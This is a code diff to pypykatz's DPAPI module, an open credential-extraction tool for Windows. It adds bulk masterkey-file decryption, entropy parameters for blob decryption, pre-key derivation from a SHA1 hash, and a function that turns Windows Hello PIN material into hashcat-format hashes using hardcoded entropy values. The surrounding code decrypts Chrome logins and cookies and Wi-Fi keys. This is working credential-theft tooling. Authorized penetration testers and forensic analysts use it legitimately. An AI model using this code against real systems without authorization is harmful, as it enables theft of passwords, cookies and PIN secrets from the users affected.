@@ -16,7 +16,7 @@ import glob
 import sqlite3
 import base64
 import platform
-from hashlib import sha1, pbkdf2_hmac
+from hashlib import sha1, pbkdf2_hmac, sha512
 
 import xml.etree.ElementTree as ET
 
@@ -25,9 +25,14 @@ from pypykatz.dpapi.structures.masterkeyfile import MasterKeyFile
 from pypykatz.dpapi.structures.credentialfile import CredentialFile, CREDENTIAL_BLOB
 from pypykatz.dpapi.structures.blob import DPAPI_BLOB
 from pypykatz.dpapi.structures.vault import VAULT_VCRD, VAULT_VPOL, VAULT_VPOL_KEYS
+from pypykatz.dpapi.finders.ngc import NGCProtectorFinder, NGCProtector
+from pypykatz.dpapi.finders.cryptokeys import CryptoKeysFinder
+
 from unicrypto.hashlib import md4 as MD4
 from unicrypto.symmetric import AES, MODE_GCM, MODE_CBC
 from winacl.dtyp.wcee.pvkfile import PVKFile
+from winacl.dtyp.wcee.cryptoapikey import CryptoAPIKeyFile, CryptoAPIKeyProperties
+
 from pypykatz.commons.common import UniversalEncoder, base64_decode_url
 
 
@@ -131,6 +136,15 @@ class DPAPI:
 					line = line.strip()
 					self.prekeys[bytes.fromhex(line)] = 1
 
+	def dump_preferred_masterkey_guid(self, filename):
+		from uuid import UUID
+
+		with open(filename, 'rb') as f:
+			b = f.read()[:16]
+
+		guid = UUID(bytes_le = b)
+		print('[GUID] %s' % guid)
+
 	def dump_masterkeys(self, filename = None):
 		if filename is None:
 			for x in self.masterkeys:
@@ -153,7 +167,7 @@ class DPAPI:
 			self.masterkeys[guid] = bytes.fromhex(data['masterkeys'][guid])
 
 		
-	def get_prekeys_from_password(self, sid, password = None, nt_hash = None):
+	def get_prekeys_from_password(self, sid, password = None, nt_hash = None, sha1_hash=None):
 		"""
 		Creates pre-masterkeys from user SID and password of nt hash.
 		If NT hash is provided the function can only generate 2 out of the 3 possible keys, 
@@ -163,38 +177,40 @@ class DPAPI:
 		password: user's password. optional. if not provided, then NT hash must be provided
 		nt_hash: user's NT hash. optional if not provided, the password must be provided
 		"""
-		if password is None and nt_hash is None:
-			raise Exception('Provide either password or NT hash!')
+		if password is None and nt_hash is None and sha1_hash is None:
+			raise Exception('Provide either password, NT hash or SHA1 hash!')
 		
-		if password is None and nt_hash:
-			if isinstance(nt_hash, str):
+		if password is None:
+			# Will generate two keys, one with SHA1 and another with MD4
+			if nt_hash and isinstance(nt_hash, str):
 				nt_hash = bytes.fromhex(nt_hash)
-			key1 = None
+			if sha1_hash and isinstance(sha1_hash, str):
+				sha1_hash = bytes.fromhex(sha1_hash)
+
 		
+		key1 = key2 = key3 = key4 = None
 		if password or password == '':
 			ctx = MD4(password.encode('utf-16le'))
 			nt_hash = ctx.digest()
+			sha1_hash = sha1(password.encode('utf-16le')).digest()
+		if sha1_hash:
+			key1 = hmac.new(sha1_hash, (sid + '\0').encode('utf-16le'), sha1).digest()
+			key4 = sha1_hash
+		if nt_hash:
+			key2 = hmac.new(nt_hash, (sid + '\0').encode('utf-16le'), sha1).digest()
+			# For Protected users
+			tmp_key = pbkdf2_hmac('sha256', nt_hash, sid.encode('utf-16le'), 10000)
+			tmp_key_2 = pbkdf2_hmac('sha256', tmp_key, sid.encode('utf-16le'), 1)[:16]
+			key3 = hmac.new(tmp_key_2, (sid + '\0').encode('utf-16le'), sha1).digest()[:20]
+		
+		count = 1
+		for key in [key1, key2, key3, key4]:
+			if key is not None:
+				self.prekeys[key] = 1
+				logger.debug('Prekey_%d %s %s %s %s' % (count, sid, password, nt_hash, key.hex()))
+			count += 1
 
-			# Will generate two keys, one with SHA1 and another with MD4
-			key1 = hmac.new(sha1(password.encode('utf-16le')).digest(), (sid + '\0').encode('utf-16le'), sha1).digest()
-		
-		key2 = hmac.new(nt_hash, (sid + '\0').encode('utf-16le'), sha1).digest()
-		# For Protected users
-		tmp_key = pbkdf2_hmac('sha256', nt_hash, sid.encode('utf-16le'), 10000)
-		tmp_key_2 = pbkdf2_hmac('sha256', tmp_key, sid.encode('utf-16le'), 1)[:16]
-		key3 = hmac.new(tmp_key_2, (sid + '\0').encode('utf-16le'), sha1).digest()[:20]
-		
-		if key1 is not None:
-			self.prekeys[key1] = 1
-		self.prekeys[key2] = 1
-		self.prekeys[key3] = 1
-		
-		if key1 is not None:
-			logger.debug('Prekey_1 %s %s %s %s' % (sid, password, nt_hash, key1.hex()))
-		logger.debug('Prekey_2 %s %s %s %s' % (sid, password, nt_hash, key2.hex()))
-		logger.debug('Prekey_3 %s %s %s %s' % (sid, password, nt_hash, key3.hex()))
-		
-		return key1, key2, key3
+		return key1, key2, key3, key4
 				
 	def __get_registry_secrets(self, lr):
 		"""
@@ -221,7 +237,7 @@ class DPAPI:
 			for secret in lr.sam.secrets:
 				if secret.nt_hash:
 					sid = '%s-%s' % (lr.sam.machine_sid, secret.rid)
-					x, key2, key3 = self.get_prekeys_from_password(sid, nt_hash = secret.nt_hash)
+					x, key2, key3, y = self.get_prekeys_from_password(sid, nt_hash = secret.nt_hash)
 					logger.debug('[DPAPI] NT hash method. Calculated user key for user %s! Key2: %s Key3: %s' % (sid, key2, key3))
 					user.append(key2)
 					user.append(key3)
@@ -365,7 +381,27 @@ class DPAPI:
 		returns: CREDENTIAL_BLOB object
 		"""
 		with open(file_path, 'rb') as f:
-			return self.decrypt_masterkey_bytes(f.read(), key = key)
+			mks, bks = self.decrypt_masterkey_bytes(f.read(), key = key)
+			self.masterkeys.update(mks)
+			self.masterkeys.update(bks)
+			return mks, bks
+		
+	def decrypt_masterkey_directory(self, directory, ignore_errors: bool = True):
+		"""
+		Decrypts all Masterkeyfiles in a directory
+		directory: path to directory
+		ignore_errors: if set to True, the function will not raise exceptions if a file cannot be decrypted
+		returns: dictionary of guid->keybytes
+		"""
+		for filename in glob.glob(os.path.join(directory, '**'), recursive = True):
+			if os.path.isfile(filename):
+				try:
+					self.decrypt_masterkey_file(filename)
+				except Exception as e:
+					if ignore_errors is False:
+						raise e
+					logger.debug('Failed to decrypt %s Reason: %s' % (filename, e))
+		return self.masterkeys
 	
 	def decrypt_masterkey_bytes(self, data, key = None):
 		"""
@@ -424,8 +460,18 @@ class DPAPI:
 		"""
 		with open(file_path, 'rb') as f:
 			return self.decrypt_credential_bytes(f.read())
+		
+	def get_key_for_blob(self, blob):
+		"""
+		Looks up the masterkey for a given DPAPI_BLOB object
+		blob: DPAPI_BLOB object
+		returns: bytes of the decryption key
+		"""
+		if blob.masterkey_guid not in self.masterkeys:
+			raise Exception('No matching masterkey was found for the blob!')
+		return self.masterkeys[blob.masterkey_guid]
 	
-	def decrypt_credential_bytes(self, data):
+	def decrypt_credential_bytes(self, data, entropy = None):
 		"""
 		Decrypts CredentialFile bytes
 		CredentialFile holds one DPAPI blob, so the decryption is straightforward, and it also has a known structure for the cleartext.
@@ -435,11 +481,11 @@ class DPAPI:
 		returns: CREDENTIAL_BLOB object
 		"""
 		cred = CredentialFile.from_bytes(data)
-		dec_data = self.decrypt_blob_bytes(cred.data)
+		dec_data = self.decrypt_blob_bytes(cred.data, entropy = entropy)
 		cb = CREDENTIAL_BLOB.from_bytes(dec_data)
 		return cb
 		
-	def decrypt_blob(self, dpapi_blob, key = None):
+	def decrypt_blob(self, dpapi_blob, key = None, entropy = None):
 		"""
 		Decrypts a DPAPI_BLOB object
 		The DPAPI blob has a GUID attributes which indicates the masterkey to be used, also it has integrity check bytes so it is possible to tell is decryption was sucsessfull.
@@ -453,9 +499,9 @@ class DPAPI:
 			if dpapi_blob.masterkey_guid not in self.masterkeys:
 				raise Exception('No matching masterkey was found for the blob!')
 			key = self.masterkeys[dpapi_blob.masterkey_guid]
-		return dpapi_blob.decrypt(key)
+		return dpapi_blob.decrypt(key, entropy = entropy)
 		
-	def decrypt_blob_bytes(self, data, key = None):
+	def decrypt_blob_bytes(self, data, key = None, entropy = None):
 		"""
 		Decrypts DPAPI_BLOB bytes.
 		
@@ -468,7 +514,7 @@ class DPAPI:
 		
 		blob = DPAPI_BLOB.from_bytes(data)
 		logger.debug(str(blob))
-		return self.decrypt_blob(blob, key = key)
+		return self.decrypt_blob(blob, key = key, entropy = entropy)
 		
 	def decrypt_vcrd_file(self, file_path):
 		"""
@@ -521,7 +567,7 @@ class DPAPI:
 				res[attr].append(cleartext)
 		return res
 					
-	def decrypt_vpol_bytes(self, data):
+	def decrypt_vpol_bytes(self, data, entropy = None):
 		"""
 		Decrypts the VPOL file, and returns the two keys' bytes
 		A VPOL file stores two encryption keys.
@@ -530,7 +576,7 @@ class DPAPI:
 		returns touple of bytes, describing two keys
 		"""
 		vpol = VAULT_VPOL.from_bytes(data)
-		res = self.decrypt_blob_bytes(vpol.blobdata)
+		res = self.decrypt_blob_bytes(vpol.blobdata, entropy = entropy)
 		
 		keys = VAULT_VPOL_KEYS.from_bytes(res)
 		
@@ -551,8 +597,8 @@ class DPAPI:
 		with open(file_path, 'rb') as f:
 			return self.decrypt_vpol_bytes(f.read())
 
-	def decrypt_securestring_bytes(self, data):
-		return self.decrypt_blob_bytes(data)
+	def decrypt_securestring_bytes(self, data, entropy = None):
+		return self.decrypt_blob_bytes(data, entropy = entropy)
 		
 	def decrypt_securestring_hex(self, hex_str):
 		return self.decrypt_securestring_bytes(bytes.fromhex(hex_str))
@@ -703,9 +749,6 @@ class DPAPI:
 		
 		
 	def decrypt_all_chrome(self, dbpaths, throw = False):
-		from unicrypto import use_library, get_cipher_by_name
-		AES = get_cipher_by_name('AES', 'cryptography')
-
 		results = {}
 		results['logins'] = []
 		results['cookies'] = []
@@ -736,7 +779,7 @@ class DPAPI:
 						dec_val = cipher.decrypt(ciphertext, b'', tag)
 						results['cookies'].append((dbpaths[username]['cookies'], host_key, name, path, dec_val ))
 						results['fmtcookies'].append(DPAPI.cookieformatter('https://' + host_key, name, path, dec_val))
-					else:
+					elif encrypted_value:
 						dec_val = self.decrypt_blob_bytes(encrypted_value)
 						results['cookies'].append((dbpaths[username]['cookies'], host_key, name, path, dec_val ))
 						results['fmtcookies'].append(DPAPI.cookieformatter('https://' + host_key, name, path, dec_val))
@@ -807,6 +850,17 @@ class DPAPI:
 	@staticmethod
 	def get_all_wifi_settings_live():
 		return DPAPI.get_all_wifi_settings_offline(DPAPI.get_windows_drive_live())
+	
+	@staticmethod
+	def strongentropy(password:str, entropy = None, dtype = 2):
+		"""This function generates the "extra" entropy based on the password and the provided entropy (opt)."""
+		res = b'' if entropy is None else entropy
+		if dtype == 2:
+			res += sha512(password.encode('utf-16-le')).digest()
+		else:
+			res += sha1(password.encode('utf-16-le')).digest()
+		return res
+
 
 	def decrypt_wifi_live(self):
 		# key is encrypted as system!!!
@@ -866,6 +920,29 @@ class DPAPI:
 
 		keyvalue_dec = self.decrypt_cloudap_key(keyvalue)
 		return keyvalue_dec
+	
+	def winhello_pin_hash_offline(self, ngc_dir, cryptokeys_dir):
+		"""This function presupposes that the DPAPI object already has all necessary keys loaded."""
+		results = []
+		pin_guids = []
+		for entry in NGCProtectorFinder.from_dir(ngc_dir):
+			pin_guids.append(entry.guid)
+
+		for entry in CryptoKeysFinder.from_dir(cryptokeys_dir):
+			if entry.description in pin_guids:
+				print(f'Found matching GUID: {entry.description}')
+				properties_raw = self.decrypt_blob_bytes(entry.fields[1], entropy=b'6jnkd5J3ZdQDtrsu\x00')
+				properties = CryptoAPIKeyProperties.from_bytes(properties_raw)
+				blob = DPAPI_BLOB.from_bytes(entry.fields[2])
+
+				salt = properties['NgcSoftwareKeyPbkdf2Salt'].value
+				iterations = properties['NgcSoftwareKeyPbkdf2Round'].value
+
+				entropy = b'\x78\x54\x35\x72\x5a\x57\x35\x71\x56\x56\x62\x72\x76\x70\x75\x41\x00'
+				hashcat_format = f'$WINHELLO$*SHA512*{iterations}*{salt.hex()}*{blob.signature.hex()}*{self.get_key_for_blob(blob).hex()}*{blob.HMAC.hex()}*{blob.to_sign.hex()}*{entropy.hex()}'
+
+				results.append(hashcat_format)
+		return results
 
 
 
@@ -895,4 +972,4 @@ def main():
 
 
 if __name__ == '__main__':
-	main()
\ No newline at end of file
+	main()
